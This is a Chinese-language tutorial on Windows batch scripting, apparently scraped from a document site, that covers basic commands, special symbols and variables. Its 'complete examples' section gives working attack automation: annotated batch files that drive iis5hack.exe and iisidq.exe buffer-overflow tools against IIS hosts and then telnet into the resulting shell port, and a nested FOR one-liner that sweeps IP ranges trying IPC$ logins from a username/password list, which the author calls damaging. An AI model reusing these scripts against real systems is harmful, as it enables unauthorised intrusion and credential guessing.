windows批處理命令及腳本實例

1、Start批處理文件是將一系列命令按一定的順序集合為一個可執(zhí)行的文本文件，其擴(kuò)展名為BAT。第一部分：批處理內(nèi)部命令1、 REM REM 是個注釋命令一般是用來給程序加上注解的，該命令后的內(nèi)容在程序執(zhí)行的時候?qū)⒉粫伙@示和執(zhí)行。例： REM 你現(xiàn)在看到的就是注解，這一句將不會被執(zhí)行。在以后的例子中解釋的內(nèi)容都REM 會放在REM后面。請大家注意。 2、 ECHO ECHO 是一個回顯命令主要參數(shù)有OFF和 ON,一般用ECHO message來顯示一個特定的消息 。例： Echo off Rem 以上代表關(guān)閉回顯即不顯示所執(zhí)行的命令 Echo 這個就是消息。 Rem 以上代表顯示"這

2、就是消息"這列字符 執(zhí)行結(jié)果： C:>ECHO.BAT 這個就是消息。 3、 GOTO GOTO 即為跳轉(zhuǎn)的意思。在批處理中允許以"：XXX"來構(gòu)建一個標(biāo)號然后用GOTO ：標(biāo)號直接來執(zhí)行標(biāo)號后的命令。例 :LABEL REM 上面就是名為LABEL的標(biāo)號。 DIR C: DIR D: GOTO LABEL REM 以上程序跳轉(zhuǎn)標(biāo)號LABEL處繼續(xù)執(zhí)行。 4、CALL CALL 命令可以在批處理執(zhí)行過程中調(diào)用另一個批處理，當(dāng)另一個批處理執(zhí)行完后再繼續(xù)執(zhí)行原來的批處理。例： 批處理2.BAT內(nèi)容如下： ECHO 這就是2的內(nèi)容 批處理1.BAT內(nèi)容如下： EC

3、HO 這是1的內(nèi)容 CALL 2.BAT ECHO 1和2的內(nèi)容全部顯示完成 執(zhí)行結(jié)果如下： C:>1.BAT 這是1的內(nèi)容 這就是2的內(nèi)容 1和2的內(nèi)容全部顯示完成 5、PAUSE PAUSE 停止系統(tǒng)命令的執(zhí)行并顯示下面的內(nèi)容。例： C:> PAUSE 請按任意鍵繼續(xù) . . . 6、 IF IF 條件判斷語句，語法格式如下： IF NOT ERRORLEVEL number command IF NOT string1=string2 command IF NOT EXIST filename command 說明： NOT 將返回的結(jié)果取反值即"如果沒有"

4、;的意思。 ERRORLEVEL 是命令執(zhí)行完成后返回的退出值 Number 退出值的數(shù)字取值范圍0255。判斷時值的排列順序應(yīng)該又大到小。返回的值大于或等于指定的值時條件成立。 string1=string2 string1和string2都為字符的數(shù)據(jù)，英文字符的大小寫將看做不同，這個條件中的等于號必須是2個（絕對相等），條件想等后即執(zhí)行后面的 command EXIST filename 為文件或目錄存在的意思。 IF ERRORLEVEL這條語句必須放在某一個命令后面。執(zhí)行命令后由IF ERRORLEVEL來判斷命令的返回值。 例： 1、 IF NOT ERRORLEVEL numbe

5、r command 檢測命令執(zhí)行完后的返回值做出判斷。 echo off dir z: rem 如果退出代碼為1（不成功）就跳至標(biāo)題1處執(zhí)行 IF ERRORLEVEL 1 goto 1 rem 如果退出代碼為0（成功）就跳至標(biāo)題0處執(zhí)行 IF ERRORLEVEL 0 goto 0 :0 echo 命令執(zhí)行成功！ Rem 程序執(zhí)行完畢跳至標(biāo)題exit處退出 goto exit :1 echo 命令執(zhí)行失?。?Rem 程序執(zhí)行完畢跳至標(biāo)題exit處退出 goto exit :exit Rem 這里是程序的出口 2、 IF string1=string2 command 檢測當(dāng)前變量的值做出判斷

6、 ECHO OFF IF %1=2 goto no Echo 變量相等！ Goto exit :no echo 變量不相等 goto exit :exit 大家可以這樣看效果 C:>test.bat 數(shù)字 3、 IF NOT EXIST filename command 發(fā)現(xiàn)特定的文件做出判斷 echo off IF not EXIST autoexec.bat goto 1 echo 文件存在成功！ goto exit :1 echo 文件不存在失??！ goto exit :exit 這個批處理大家可以放在c盤和d盤分別執(zhí)行看看效果。 7、 FOR FOR這個命令比較特殊是一個循環(huán)執(zhí)行

7、命令的命令，同時FOR的循環(huán)里面還可以套用FOR在進(jìn)行循環(huán)。這篇我們介紹基本的用法就不做套用的循環(huán)了，后面再來講解套用的循環(huán)。在批處理中FOR的命令如下： FOR %c IN (set) DO command arguments 在命令行中命令如下： FOR %c IN (set) DO command arguments 常用參數(shù)： /L 該集表示以增量形式從開始到結(jié)束的一個數(shù)字序列。因此，(1,1,5) 將產(chǎn)生序列 1 2 3 4 5，(5,-1,1) 將產(chǎn)生序列 (5 4 3 2 1)。 /D 如果集中包含通配符，則指定與目錄名匹配，而不與文件名匹配。 /F 從指定的文件中讀取數(shù)據(jù)作為變

8、量 eol=c - 指一個行注釋字符的結(jié)尾(就一個) skip=n - 指在文件開始時忽略的行數(shù)。 delims=xxx - 指分隔符集。這個替換了空格和跳格鍵的默認(rèn)分隔符集。 tokens=x,y,m-n - 指每行的哪一個符號被傳遞到每個迭代的 for 本身。這會導(dǎo)致額外變量名稱的分配。m-n格式為一個范圍。通過 nth 符號指定 mth。如果符號字符串中的最后一個字符星號，那么額外的變量將在最后一個符號解析之后分配并接受行的保留文本。 usebackq - 指定新語法已在下類情況中使用:在作為命令執(zhí)行一個后引號的字符串并且一個單引號字符為文字字符串命令并允許在 filenameset中使

9、用雙引號擴(kuò)起文件名稱。 下面來看一個例子： FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do echo %i %j %k 會分析 myfile.txt 中的每一行，忽略以分號打頭的那些行，將每行中的第二個和第三個符號傳遞給 for 程序體；用逗號和/或空格定界符號。請注意，這個 for 程序體的語句引用 %i 來取得第二個符號，引用 %j 來取得第三個符號，引用 %k來取得第三個符號后的所有剩余符號。對于帶有空格的文件名，您需要用雙引號將文件名括起來。為了用這種方式來使用雙引號，您還需要使用 useback

10、q 選項，否則，雙引號會被理解成是用作定義某個要分析的字符串的。 %i 專門在 for 語句中得到說明，%j 和 %k 是通過tokens= 選項專門得到說明的。您可以通過 tokens= 一行指定最多 26 個符號，只要不試圖說明一個高于字母 'z' 或'Z' 的變量。請記住，F(xiàn)OR 變量名分大小寫，是通用的；而且，同時不能有 52 個以上都在使用中。 您還可以在相鄰字符串上使用 FOR /F 分析邏輯；方法是，用單引號將括號之間的 filenameset 括起來。這樣，該字符串會被當(dāng)作一個文件中的一個單一輸入行。最后，您可以用 FOR /F 命令來分析命令的

11、輸出。方法是，將括號之間的 filenameset 變成一個反括字符串。該字符串會被當(dāng)作命令行，傳遞到一個子 CMD.EXE，其輸出會被抓進(jìn)內(nèi)存，并被當(dāng)作文件分析。因此，以下例子: FOR /F "usebackq delims=" %i IN (set) DO echo %i 會枚舉當(dāng)前環(huán)境中的環(huán)境變量名稱。 以下列舉一個簡單的例子，他將說明參數(shù)/L和沒有參數(shù)的區(qū)別： 刪除文件1.TXT 2.TXT 3.TXT 4.TXT 5.TXT 例： ECHO OFF FOR /L %F IN (1,1,5) DO DEL %F.TXT 或 FOR %F IN (1,2,3,4,5

12、) DO DEL %F.TXT 以上2條命令執(zhí)行的結(jié)果都是一樣的如下： C:>DEL 1.TXT C:>DEL 2.TXT C:>DEL 3.TXT C:>DEL 4.TXT C:>DEL 5.TXT 8、 SETLOCAL 開始批處理文件中環(huán)境改動的本地化操作。在執(zhí)行 SETLOCAL 之后 所做的環(huán)境改動只限于批處理文件。要還原原先的設(shè)置，必須執(zhí) 行 ENDLOCAL。 達(dá)到批處理文件結(jié)尾時，對于該批處理文件的每個 尚未執(zhí)行的 SETLOCAL 命令，都會有一個隱含的 ENDLOCAL 被 執(zhí)行。例： ECHO OFF SET PATH /*察看環(huán)境變量PAT

13、H PAUSE SETLOCAL SET PATH=E:TOOLS /*重新設(shè)置環(huán)境變量PATH SET PATH PAUSE ENDLOCAL SET PATH 從上例我們可以看到環(huán)境變量PATH第1次被顯示得時候是系統(tǒng)默認(rèn)路徑。被設(shè)置成了E:TOOLS后顯示為E:TOOLS但當(dāng)ENDLOCAL后我們可以看到他又被還原成了系統(tǒng)的默認(rèn)路徑。但這個設(shè)置只在該批處理運行的時候有作用。當(dāng)批處理運行完成后環(huán)境變量PATH將會還原。 9、 SHIFT SHIFT命令可以讓在命令上的的命令使用超過10個（%0%9）以上的可替代參數(shù)例： ECHO OFF ECHO %1 %2 %3 %4 %5 %6 %7

14、%8 %9 SHIFT ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9 SHIFT ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9 執(zhí)行結(jié)果如下： C:>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11 1 2 3 4 5 6 7 8 9 2 3 4 5 6 7 8 9 10 3 4 5 6 7 8 9 10 11 以上就是基于WIN2000下的9個批處理命令。 第二部分：特殊的符號與批處理 在命令行下有些符號是不允許使用的但有些符號卻有著特殊的意義。 1、 符號() 在批處理中的意思是關(guān)閉當(dāng)前行的回顯。我們從上面知道用命令echo of

15、f可以關(guān)掉整個批處理的命令回顯但卻不能不顯示echo off這個命令?，F(xiàn)在我們在這個命令前加上這樣echo off這一命令就被關(guān)閉了回顯從而達(dá)到所有命令均不回顯得要求 2、 符號(>) >的意思是傳遞并覆蓋。他所起的作用是將運行后的回顯結(jié)果傳遞到后面的范圍（后面可是文件也可是默認(rèn)的系統(tǒng)控制臺）例： 文件1.txt的文件內(nèi)容為： 1+1 使用命令c:>dir *.txt >1.txt 這時候1.txt的內(nèi)容如下 驅(qū)動器 C 中的卷沒有標(biāo)簽。 卷的序列號是 301A-1508 C: 的目錄 2003-03-11 14:04 1,005 FRUNLOG.TXT 2003-04

16、-04 16:38 18,598,494 log.txt 2003-04-04 17:02 5 1.txt 2003-03-12 11:43 0 aIErrorlog.txt 2003-03-30 00:35 30,571 202.108.txt 5 個文件 18,630,070 字節(jié) 0 個目錄 1,191,542,784 可用字節(jié) >將命令執(zhí)行的結(jié)哺橇嗽嫉奈募諶蕁? 在傳遞給控制臺的時候程序?qū)⒉粫腥魏位仫@（注意：這里的回顯跟echo off關(guān)掉的回顯不是同一概念。Echo off關(guān)掉的是輸入命令的回顯，這里的回顯是程序執(zhí)行中或后的回顯）例： C:>dir *.txt >

17、nul 程序?qū)]有任何顯示也不會產(chǎn)生任何痕跡。 3、 符號(>>) 符號>>的作用與符號>相似，但他們的區(qū)別在于>>是傳遞并在文件末尾追加>>也可將回顯傳遞給控制臺（用法同上）例： 文件1.txt內(nèi)同為： 1+1 使用命令c:>dir *.txt >>1.txt 這時候1.txt的內(nèi)容如下 1+1 驅(qū)動器 C 中的卷沒有標(biāo)簽。 卷的序列號是 301A-1508 C: 的目錄 2003-03-11 14:04 1,005 FRUNLOG.TXT 2003-04-04 16:38 18,598,494 log.txt 2003

18、-04-04 17:02 5 1.txt 2003-03-12 11:43 0 aIErrorlog.txt 2003-03-30 00:35 30,571 202.108.txt 5 個文件 18,630,070 字節(jié) 0 個目錄 1,191,542,784 可用字節(jié) >>將命令執(zhí)行的結(jié)果覆加在了原始的文件內(nèi)容后面。 4、 符號(|) |是一個管道傳輸命令意思是將上一命令執(zhí)行的結(jié)果傳遞給下一命令去處理。例： C:>dir c:|find "1508" 卷的序列號是 301A-1508 以上命令的意思為查找c:的所有并發(fā)現(xiàn)1508字符串。Find的用法請用

19、 find /?自行查看 在不使用format的自動格式化參數(shù)的時候我是這樣來自動格式化盤片的 echo y|fornat a: /s /q /v:system 用過format命令的人都知道format有一個交互對化過程，要使用者輸入y來確定當(dāng)前的命令是否被執(zhí)行。在這個命令前加上echo y并用管道傳輸符|將echo執(zhí)行的結(jié)果y傳遞給format從而達(dá)到手工輸入y的目的（這條命令有危害性，測試的時候請謹(jǐn)慎） 5、 符號() 是對特殊符號 > 、<、 &、的前導(dǎo)字符。在命令中他將以上的3個符號的特殊動能去掉僅僅只吧他們當(dāng)成符號而不使用他們的特殊意義。例： c:>ech

20、o test > 1.txt test > 1.txt 從上面可以看出并沒有把test寫入文件1.txt而是將test >1.txt 當(dāng)字符串顯示了出來。這個符號在遠(yuǎn)程構(gòu)建批處理的時候很有效果。 6、 符號(&) &符號允許在一行中使用2個以上不同的命令，當(dāng)?shù)谝粋€命令執(zhí)行失敗將不影響第2個命令的執(zhí)行。例： c:> dir z: &dir y: &dir c: 以上的命令將會連續(xù)顯示z: y: c:盤內(nèi)的內(nèi)容不理會該盤符是否存在。 7、 符號(&&) &&符號也是允許在一行中使用2個以上不同的命令，當(dāng)?shù)谝粋€命

21、令執(zhí)行失敗后后續(xù)的命令將不會再被執(zhí)行。例： c:> dir z: &&dir y: &&dir c: 以上的命令將會提示檢查是否存在z:盤如果存在則執(zhí)行，如果不存在則停止執(zhí)行所有的后續(xù)命令 8、 符號(" ") " "符號允許在字符串中包含空格。進(jìn)入一個特殊的目錄可以用如下方法例: c:>cd "Program Files" c:>cd progra1 c:>cd pro* 以上方法都可以進(jìn)入Program Files目錄 9、 符號（,） ,符號相當(dāng)于空格。在某些特殊的情況下可

22、以用,來代替空格使用。例： c:>dir,c: 10、 符號(;) ;符號當(dāng)命令相同的時候可以將不同的目標(biāo)用;隔離開來但執(zhí)行效果不變。如執(zhí)行過程中發(fā)生錯誤則只返回錯誤報告但程序還是會繼續(xù)執(zhí)行。例： DIR C:;D:;E:F: 以上的命令相當(dāng)于 DIR C: DIR D: DIR E: DIR F: 當(dāng)然還有些特殊的符號但他們的使用范圍很小我就不再這里一一的說明了。 第三部分：批處理與變量 在批處理中適當(dāng)?shù)囊米兞繉鼓闼幹频某绦驊?yīng)用面更廣。批處理每次能處理的變量從%0%9共10個。其中%0默認(rèn)給批處理的文件名使用。除非在使用SHIFT命令后%0才能被%1所替代。引用shift命令的

23、例子如果把%1前面多加上一個%0那么結(jié)果如下： C:>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11 SHIFT.BAT 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 10 2 3 4 5 6 7 8 9 10 11 系統(tǒng)是如何區(qū)分每個變量的呢，系統(tǒng)區(qū)分變量的規(guī)則為字符串中間的空格，即只要發(fā)現(xiàn)空格就把空格前面的字符當(dāng)作一個變量而空格后面的字符則作為另一個變量。如果你的變量是一個當(dāng)中包含空格的長目錄名這時候你需要用上一節(jié)特殊符號8中所用的引號將他圈起來。例： 批處理內(nèi)容為： ECHO %1 ECHO %2 ECHO %3 輸入命令： C:>

24、;TEST "Program Files" Program Files Program Files Program Files 在一個復(fù)雜的批處理中又可能同時使用的變量會超過10個這時候會和系統(tǒng)的規(guī)則想沖突那么這個問題怎么解決呢？在系統(tǒng)中還有一種變量稱之為環(huán)境變量（使用SET命令可以查看當(dāng)前系統(tǒng)的環(huán)境變量）如當(dāng)前系統(tǒng)目錄是%windir%或%SystemRoot%等。當(dāng)同時使用的參數(shù)超過10個的時候，我們可以把某些在后面的程序中還要調(diào)用的變量保存為環(huán)境變量。具體用法如 SET A=%1 這樣我們就命名了一個新的環(huán)境變量A 在調(diào)用變量A的時候要%A%這樣調(diào)用，環(huán)境變量不受SH

25、IFT命令影響。如果要改變一個環(huán)境變量需要重新對其設(shè)置才能改變。當(dāng)然也可以進(jìn)行變量與變量之間的傳遞來達(dá)到目的。下面我們來看一個例子，批處理如下： ECHO OFF SET PASS=%1 SHIFT SET PASS1=%1 SHIFT ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9 SHIFT ECHO %PASS% %PASS1% %9 SET PASS=%PASS1% 變量的傳遞 SET PASS1=%9 SHIFT ECHO %PASS% %PASS1% %9 使用命令：C:>TEST A B 3 4 5 6 7 8 9 10 K L

26、 A B 3 4 5 6 7 8 9 10 K 注意：這一行顯示了11個變量 A B L 在使用了3次SHIFT之后%9變成了L B L 變量的傳遞后的結(jié)果 第四部分：完整案例 以上就是批處理的一些用法?，F(xiàn)在我們把這些用法結(jié)合起來詳細(xì)的分析一下目前網(wǎng)上發(fā)布的一些批處理，看看他們是怎么運作的。這里我將列舉三個例子來詳細(xì)分析，為了保持程序的完整我的注釋會加在/*后面。 例一 這個例子是利用iis5hack.exe對有.printer漏洞的主機(jī)進(jìn)行溢出的批處理。用到的程序有iis5hack.exe和系統(tǒng)自帶的telnet.exe。iis5hack的命令格式為： iis5hack <目標(biāo)ip&g

27、t; <目標(biāo)端口> <目標(biāo)版本> <溢出連接端口>目標(biāo)版本為0-9這10個數(shù)字分別對應(yīng)不同語言版本和sp的系統(tǒng)版本，我們編制的批處理使用的命令格式為 <iis.bat 目標(biāo)ip （開始版本號）>開始版本號可有可無。程序如下。 echo off /*關(guān)閉命令回顯 if "%1%"="" goto help /*判斷%1是否為空，%1為目標(biāo)ip if "%2%"="1" goto 1 /*判斷%2是否為1，為1則跳轉(zhuǎn)標(biāo)志1 if "%2%"="

28、;2" goto 2 /*%2為開始版本號，如果沒有設(shè)置則 if "%2%"="3" goto 3 /*如果存在則從匹配的地方開始執(zhí)行 if "%2%"="4" goto 4 if "%2%"="5" goto 5 if "%2%"="6" goto 6 if "%2%"="7" goto 7 if "%2%"="8" goto 8 if not

29、EXIST iis5hack.exe goto file /*沒有發(fā)現(xiàn)iis5hack.exe就執(zhí)行標(biāo)志file段內(nèi)容 ping %1 -n 1 | find "Received = 1" /*ping目標(biāo)1次，從結(jié)果中發(fā)現(xiàn)Received = 1 if errorlevel 1 goto error /*如果返回代碼為1則執(zhí)行error段(代碼1為沒有發(fā)現(xiàn) 0為發(fā)現(xiàn)并成功執(zhí)行) iis5hack %1 80 9 88 | find "good" /*開始溢出目標(biāo)端口80 系統(tǒng)代碼9 溢出后連接端口88 在執(zhí)行結(jié)果中發(fā)現(xiàn)字符串"good&quo

30、t;(溢出成功后才會有字符串good) if not errorlevel 1 goto telnet /*如果沒有錯誤代碼1（溢出成功）就執(zhí)行telnet段的內(nèi)容。 echo 操作系統(tǒng)類型 9 失敗! /否則顯示這一句 :8 /*以下代碼內(nèi)容參照上面 iis5hack %1 80 8 88 | find "good" if not errorlevel 1 goto telnet echo 操作系統(tǒng)類型 8 失敗! :7 iis5hack %1 80 7 88 | find "good" if not errorlevel 1 goto telnet

31、echo 操作系統(tǒng)類型 7 失敗! :6 iis5hack %1 80 6 88 | find "good" if not errorlevel 1 goto telnet echo 操作系統(tǒng)類型 6 失敗! :5 iis5hack %1 80 5 88 | find "good" if not errorlevel 1 goto telnet echo 操作系統(tǒng)類型 5 失敗! :4 iis5hack %1 80 4 88 | find "good" if not errorlevel 1 goto telnet echo 操作系統(tǒng)

32、類型 4 失敗! :3 iis5hack %1 80 3 88 | find "good" if not errorlevel 1 goto telnet echo 操作系統(tǒng)類型 3 失敗! :2 iis5hack %1 80 2 88 | find "good" if not errorlevel 1 goto telnet echo 操作系統(tǒng)類型 2 失敗! :1 iis5hack %1 80 1 88 | find "good" if not errorlevel 1 goto telnet echo 操作系統(tǒng)類型 1 失敗!

33、:0 iis5hack %1 80 0 88 | find "good" if not errorlevel 1 goto telnet echo 操作系統(tǒng)類型 0 失敗! goto error :telnet telnet %1 88 /*開始連接目標(biāo)ip的88端口 goto exit /*連接中斷后跳轉(zhuǎn)exit段 :error /*error段顯示錯誤后的幫助信息 echo 可能網(wǎng)絡(luò)不能連接或者對方以修補(bǔ)該漏洞!請按照下面的格式手工嘗試一次! echo iis5hack 目標(biāo)IP WEB端口 系統(tǒng)類型 開放端口 ECHO 中文: 0 ECHO 中文+sp1: 1 ECH

34、O 英文: 2 ECHO 英文+sp1: 3 ECHO 日語: 4 ECHO 日語+sp1: 5 ECHO 韓文: 6 ECHO 韓文+sp1: 7 ECHO 墨西哥語: 8 ECHO 墨西哥語+sp1: 9 goto exit /*跳轉(zhuǎn)exit段 :file /*file段顯示文件沒有發(fā)現(xiàn)的信息 echo 文件iis5hack.exe沒有發(fā)現(xiàn)!程序終止運行! goto exit /*跳轉(zhuǎn)exit段 :help /*help段顯示本批處理的使用格式幫助 echo 本程序用法如下: echo iis 目標(biāo)ip echo iis 目標(biāo)ip 開始的號碼9-0 :exit /*exit段為程序出口 這

35、個批處理基本沒有什么循環(huán)只是一路走下來。所以代碼比較長難度不大！ 例二 這個例子是用iisidq.exe對有idq漏洞的機(jī)器進(jìn)行溢出的批處理。使用的程序有iisidq.exe和系統(tǒng)自帶的程序telnet.exe。iisidq.exe的用法如下： 運行參數(shù): 操作系統(tǒng)類型 目的地址 web端口 1 溢出監(jiān)聽端口 <輸入命令1> 其中,如果輸入命令參數(shù)沒有輸入,那么,默認(rèn)為:"cmd.exe"。 其中操作系統(tǒng)類型類型的代碼范圍是0-14。我們編制的批處理使用的命令格式為 <idq.bat 目標(biāo)ip>程序如下： echo off /*同例一 if not

36、EXIST iisidq.exe goto file /*同例一 if %1 = "" goto error /*同例一 ping %1 -n 1 | find "Received = 1" /*同例一 if errorlevel 1 goto error1 /*同例一 set b=%1 /*創(chuàng)建一個環(huán)境變量b,將變量%1的內(nèi)容傳遞給環(huán)境變量b。變量b的內(nèi)容以后將是目標(biāo)ip set a=0 /*創(chuàng)建一個環(huán)境變量a并指定環(huán)境變量a為0。由于使用整個批處理的循環(huán)所以用a來做計數(shù)器。 :no /*no段開始 if %a%=0 set d=0 /*如果環(huán)境變量a

37、=0則創(chuàng)建環(huán)境變量d設(shè)定環(huán)境變量d=0。 if %a%=1 set d=1 /*環(huán)境變量d其實是操作系統(tǒng)類型代碼，用計數(shù)器來控制其 if %a%=2 set d=2 /*變動。 if %a%=3 set d=3 if %a%=4 set d=4 if %a%=5 set d=5 if %a%=6 set d=6 if %a%=7 set d=7 if %a%=9 set d=9 if %a%=10 set d=13 if %a%=11 set d=14 goto 0 /*變量傳遞完成后轉(zhuǎn)到標(biāo)志0處運行 :1 echo 正在執(zhí)行第%d%項!與目標(biāo)%b%不能連接!正在嘗試連接請等候. :0 /*標(biāo)

38、志0開始 IISIDQ %d% %b% 80 1 99 |find "good" /*按格式發(fā)送溢出命令并在結(jié)果中發(fā)現(xiàn)字符串good（發(fā)送代碼成功才會有字符串good） if errorlevel 1 goto 1 /*如果沒有g(shù)ood字符串則沒有發(fā)送成跳 /*轉(zhuǎn)標(biāo)志1處繼續(xù)嘗試發(fā)送 ping -n 8 >nul /*ping自己8次相當(dāng)于延時8秒不顯示執(zhí) /*行結(jié)果 echo 正在執(zhí)行第%d%項! /*報告正在溢出的操作系統(tǒng)類型 telnet %b% 99 /*連接溢出端口 echo. /*顯示一個空行 if %d%=14 goto error1

39、 /*如果操作系統(tǒng)類型為14則跳轉(zhuǎn)error1處（循環(huán)出口） if %d%=13 set a=11 /*開始用計數(shù)器對操作系統(tǒng)代碼重新附值 if %d%=9 set a=10 if %d%=7 set a=9 if %d%=6 set a=7 if %d%=5 set a=6 if %d%=4 set a=5 if %d%=3 set a=4 if %d%=2 set a=3 if %d%=1 set a=2 if %d%=0 set a=1 goto no /*附值完成跳轉(zhuǎn)no段執(zhí)行 :file /*以下都是出錯后的幫助提示 echo IIsidq.exe沒有發(fā)現(xiàn)!將該文件和本文件放在同一目

40、錄! goto exit :error echo 錯誤!目標(biāo)ip不可識別!請使用下面的格式連接! echo idq 目標(biāo)IP goto exit :error1 echo 連接沒有成功!可能目標(biāo)機(jī)器已經(jīng)修補(bǔ)了該漏洞或者網(wǎng)絡(luò)故障所至! echo 請按照下面的格式手工嘗試! echo iisidq 目標(biāo)類型 目標(biāo)IP 目標(biāo)端口 連接方式 溢出端口 echo telnet 目標(biāo)ip 溢出端口 :exit /*整個程序的出口 這個批處理采用的整體循環(huán)掌握好計數(shù)器部分就掌握了這個批處理。 例三 for /l %a in (0,1,255) do for /l %b in (0,1,255) do for

41、 /l %c in (1,1,254) do for /f "tokens=1,2*" %e in (userpass.txt) do net use %1.%a.%b.%cipc$ %e /u:%f 上面的命令為1條命令。大家可以看出該命令使用了4個FOR來套用的。用法為：C:>TEST.BAT 218 當(dāng)輸入218回車后該命令會由第1個for取初始值0為%a然后繼續(xù)取第2個for的初始值0為%b繼續(xù)取第3個for的初始值1為%c最后一個for是將userpass.txt中的第一段字符作為密碼%e第二段字符作為用戶名%f最后執(zhí)行命令 (這里我把上面的值都帶進(jìn)去，設(shè)密

42、碼為123 用戶名為 abc) net usr ipc$ 123 /u:abc 當(dāng)然上面這個例子可能有些朋友會說太簡單并且太死板不靈活。我把這個例子做了些修改（完整文件見光盤ipc.bat）由興趣的朋友可以自己看看。修改后的程序可以靈活的查找你指定開始到結(jié)束或你指定開始到最大ip的范圍。當(dāng)然功能還可以在加強(qiáng)，至于能加強(qiáng)到什么地步能不能成為一個新的工具那就是你的事了。 這個的循環(huán)動作大了點主要是ip的數(shù)字替換麻煩所以沒辦法。這個批處理我就不寫注釋了，大家好好的參考上面的內(nèi)容你會很快看懂這個批處理的?？炊说貌灰f簡單哦！最起碼這是個沒有使用任何第三方工具就能探測并保存弱口令的批

43、處理了！簡單的改一改殺傷力還是很大的。以上這些批處理全部在win2000和xp下測試通過最大的優(yōu)點就是只有一個批處理文件并且絕對不會誤報。缺點就是太長！ 下面舉幾個應(yīng)用事例The first To Open windows Calculator echo off REM Start Calculator set C:WINNTSYSTEM32 start calc.exe exit The second To Open a Purging Utility echo off REM Start Purge Drive cd D:Program FilesPurgeD

44、rive start purgedrive.exe exitThe thirdTo Open Internet Explorer to  echo off REM Start 新都信息網(wǎng) in IEset C:Program FilesInternet Explorer start IExplore.exe % exit  The forthTo Open Microsoft Excel ("Beam Calculations") echo off REM Start Microsoft Excel Beam Calculationsset C:Prog

45、ram FilesMicrosoft OfficeOffice start excel.exe %D:Documentsbeamcalc.xls exit 使用方法把每一個都村存放在記事本中,然后擴(kuò)展名改為.bat運行即可看到效果第四個需要大家建立一個beamcalc.xls放到我的文檔里邊,該程序是梁的計算 是的,批處理非常方便.我都不大懂.在此還是送上一段很實用的代碼-d:cd usermd %username%docc:winntsystem32subst g: d:user%username%doc-WIN2000和win2003下,關(guān)閉遠(yuǎn)程用戶直接通過資源管理器訪問C,D,

46、E盤后.如何讓用戶有自己的空間呢.這個代碼是讓遠(yuǎn)程用戶在首次登陸服務(wù)器時自動創(chuàng)建一個虛擬盤.在D盤下自動創(chuàng)建一個文件夾,映射為用戶端的G盤每個用戶都會有一個自己的虛擬盤當(dāng)然,不用這種方式的話,也可以用WIN2003的權(quán)限管理來限制用戶對相關(guān)文件夾的訪問.我這里一臺WIN2003,一臺WIN2000就分別用了這兩種方法.還有高手也提點意見哈 if goto choice for是批處理文件中比較高級的命令，如果這幾個你用得很熟練，你就是批處理文件的專家啦。 if 表示將判斷是否符合規(guī)定的條件，從而決定執(zhí)行不同的命令。 有三種格式: 1、if "參數(shù)" = "

47、;字符串" 待執(zhí)行的命令 參數(shù)如果等于指定的字符串，則條件成立，運行命令，否則運行下一句。(注意是兩個等號）如if "%1"="a" format a: 2、if exist 文件名 待執(zhí)行的命令 如果有指定的文件，則條件成立，運行命令，否則運行下一句。如if exist config.sys edit config.sys 3、if errorlevel 數(shù)字 待執(zhí)行的命令 如果返回碼等于指定的數(shù)字，則條件成立，運行命令，否則運行下一句。如if errorlevel 2 goto x2 DOS程序運行時都會返回一個數(shù)字給DOS，稱為錯誤碼er

48、rorlevel或稱返回碼goto 批處理文件運行到這里將跳到goto 所指定的標(biāo)號處， 一般與if配合使用。 如:goto end :end echo this is the end標(biāo)號用 :字符串 表示，標(biāo)號所在行不被執(zhí)行choice 使用此命令可以讓用戶輸入一個字符，從而運行不同的命令。使用時應(yīng)該加/c:參數(shù)，c:后應(yīng)寫提示可輸入的字符，之間無空格。它的返回碼為1234如: choice /c:dme defrag,mem,end將顯示defrag,mem,endD,M,E?例如，test.bat的內(nèi)容如下: echo off choice /c:dme defrag,mem,end i

49、f errorlevel 3 goto defrag 應(yīng)先判斷數(shù)值最高的錯誤碼if errorlevel 2 goto mem if errotlevel 1 goto end :defrag c:dosdefrag goto end :mem mem goto end :end echo good bye此文件運行后，將顯示 defrag,mem,endD,M,E? 用戶可選擇d m e ，然后if語句將作出判斷，d表示執(zhí)行標(biāo)號為defrag的程序段，m表示執(zhí)行標(biāo)號為mem的程序段，e表示執(zhí)行標(biāo)號為end的程序段，每個程序段最后都以goto end將程序跳到end標(biāo)號處，然后程序?qū)@示goo

50、d bye，文件結(jié)束。for 循環(huán)命令，只要條件符合，它將多次執(zhí)行同一命令。 格式FOR %f in (集合) DO 命令 只要參數(shù)f在指定的集合內(nèi)，則條件成立，執(zhí)行命令 如果一條批處理文件中有一行: for %c in (*.bat *.txt) do type %c 含義是如果是以bat或txt結(jié)尾的文件，則顯示文件的內(nèi)容。 批處理語法擴(kuò)展名是bat(在nt/2000/xp/2003下也可以是cmd)的文件就是批處理文件。 = 注 = .bat是dos下的批處理文件 .cmd是nt內(nèi)核命令行環(huán)境的另一種批處理文件 從更廣義的角度來看，unix的shell腳本以及其它操作系統(tǒng)甚至應(yīng)

51、用程序中由外殼進(jìn)行解釋執(zhí)行的文本，都具有與批處理文件十分相似的作用，而且同樣是由專用解釋器以行為單位解釋執(zhí)行，這種文本形式更通用的稱謂是腳本語言。所以從某個程度分析，batch, unix shell, awk, basic, perl 等腳本語言都是一樣的，只不過應(yīng)用的范圍和解釋的平臺各有不同而已。甚至有些應(yīng)用程序仍然沿用批處理這一稱呼，而其內(nèi)容和擴(kuò)展名與dos的批處理卻又完全不同。 = 首先批處理文件是一個文本文件，這個文件的每一行都是一條DOS命令（大部分時候就好象我們在DOS提示符下執(zhí)行的命令行一樣），你可以使用DOS下的Edit或者windows的記事本(notepad)等任何文本文

